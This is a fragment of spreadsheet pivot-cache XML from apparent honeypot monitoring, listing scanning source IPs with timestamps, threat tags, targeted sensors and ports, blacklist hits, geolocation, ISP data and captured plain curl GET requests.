    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7222:5560"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1803"/>
    <x v="1803"/>
    <s v="NA&amp;&amp;113-61-149-111.veetime.com"/>
    <x v="0"/>
    <d v="2025-04-14T18:10:27"/>
    <d v="2025-02-21T13:40:41"/>
    <d v="2025-04-14T18:10:27"/>
    <n v="338"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;9100&amp;&amp;80&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="HoneyPot BlackListed IP"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1373"/>
    <s v="120.646"/>
    <s v="17809"/>
    <s v="VEE TIME CORP."/>
    <s v="EMAX"/>
    <s v="business"/>
    <s v="e-MAX NETWORK CORP."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:713d:956f"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1804"/>
    <x v="1804"/>
    <s v="220-133-28-187.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T18:10:26"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-14T18:10:26"/>
    <n v="339"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H25&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;51189&amp;&amp;23&amp;&amp;9100&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:1cbb"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1805"/>
    <x v="1805"/>
    <s v="114-33-109-78.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T18:10:22"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-14T18:10:22"/>
    <n v="600"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H33&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;27639&amp;&amp;23&amp;&amp;9100&amp;&amp;80&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:6d4e"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1806"/>
    <x v="1806"/>
    <s v="NA&amp;&amp;125-228-159-145.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-14T18:10:21"/>
    <d v="2024-12-16T08:38:08"/>
    <d v="2025-04-14T18:10:21"/>
    <n v="315"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H40"/>
    <s v="23&amp;&amp;34514&amp;&amp;80&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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:9f91"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1807"/>
    <x v="1807"/>
    <s v="125-228-31-206.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T18:10:20"/>
    <d v="2023-12-02T07:21:00"/>
    <d v="2025-04-14T18:10:20"/>
    <n v="585"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="25935&amp;&amp;35220&amp;&amp;80&amp;&amp;23&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login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:1fce"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1808"/>
    <x v="1808"/>
    <s v="220-134-93-244.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T18:10:17"/>
    <d v="2024-05-23T08:27:24"/>
    <d v="2025-04-14T18:10:17"/>
    <n v="570"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H15&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H23"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;25658&amp;&amp;23&amp;&amp;NA&amp;&amp;80&amp;&amp;9100&amp;&amp;53200&amp;&amp;53211"/>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NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:5df4"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1809"/>
    <x v="1809"/>
    <s v="220-134-152-45.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T18:10:17"/>
    <d v="2024-07-04T07:15:00"/>
    <d v="2025-04-14T18:10:17"/>
    <n v="470"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H9&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;61285&amp;&amp;23&amp;&amp;9100&amp;&amp;80&amp;&amp;38881&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GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc86:982d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1810"/>
    <x v="1810"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T18:06:40"/>
    <d v="2025-04-14T18:06:40"/>
    <d v="2025-04-14T18:06:40"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:bbfa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1811"/>
    <x v="1811"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T17:45:20"/>
    <d v="2025-01-15T19:51:37"/>
    <d v="2025-04-14T17:45:20"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H36"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="61"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="KR"/>
    <s v="Riau Islands"/>
    <s v="Tanjung Pinang"/>
    <s v="Tanjung Pinang"/>
    <s v="1624863"/>
    <s v="NA"/>
    <s v="0.9166700000000001"/>
    <s v="104.458"/>
    <s v="147095"/>
    <s v="PT Angkasa Bintan Cemerlang"/>
    <s v="PT Angkasa Bintan Cemerlang"/>
    <s v="business"/>
    <s v="PT Angkasa Bintan Cemerlang"/>
    <s v="2021-10-07"/>
    <s v="IDNIC-ABC-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.174.62.222,65297)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67ae:3ede"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1812"/>
    <x v="1812"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T17:42:44"/>
    <d v="2025-04-14T17:42:44"/>
    <d v="2025-04-14T17:42:44"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b638:f80a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1813"/>
    <x v="1813"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T17:28:49"/>
    <d v="2025-04-14T17:28:13"/>
    <d v="2025-04-14T17:28:49"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="CZ"/>
    <s v="Czechia"/>
    <s v="64"/>
    <s v="South Moravian"/>
    <s v="Brno-venkov"/>
    <s v="Ostopovice"/>
    <s v="3068805"/>
    <s v="NA"/>
    <s v="49.161"/>
    <s v="16.5455"/>
    <s v="9009"/>
    <s v="M247 Europe SRL"/>
    <s v="M247 Europe Infra"/>
    <s v="hosting"/>
    <s v="M247 Ltd Prague"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9246:816e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1814"/>
    <x v="1814"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T17:19:35"/>
    <d v="2025-04-14T17:19:35"/>
    <d v="2025-04-14T17:19:35"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:9650"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1815"/>
    <x v="1815"/>
    <s v="80.178.228.193.adsl.012.net.il&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T17:11:10"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-14T17:11:10"/>
    <n v="571"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
